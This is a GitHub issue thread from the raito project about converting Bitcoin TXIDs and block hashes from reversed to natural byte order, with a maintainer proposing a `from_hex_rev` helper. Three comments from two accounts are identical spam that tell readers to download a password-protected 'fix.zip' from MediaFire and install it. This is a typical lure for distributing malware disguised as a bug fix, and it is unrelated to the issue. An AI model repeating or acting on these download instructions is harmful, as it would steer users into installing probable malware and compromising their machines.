### ISSUE TITLE
[bug] TXIDs in RPC reponses have to be converted into natural order

### ISSUE THREAD

**Issue by m-kus** [keep-starknet-strange/raito#105]
TXIDs in RPC responses are in reversed order (see https://learnmeabitcoin.com/technical/general/byte-order/) while we need to deal with natural order in the code. We have to convert the test data either in the script or use alternative `from_hex_rev` helper for txid (and block hashes) specifically.

Currently this is not an immediate issue because TXIDs are initialised as `<hex>_u256.into()` however that is not explicitly obvious.

**Comment by lomasson** [comment]
Hi @m-kus, since I've been working on the script to generate test data, can i take this one ?

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by m-kus** [comment]
Sure @lomasson !
I think `from_hex_rev` would be a more explicit option and also can be used in unit tests, since reversed byte order applies to block hashes and merkle roots as well.

**Comment by lomasson** [comment]
@m-kus i think this issues would be closed
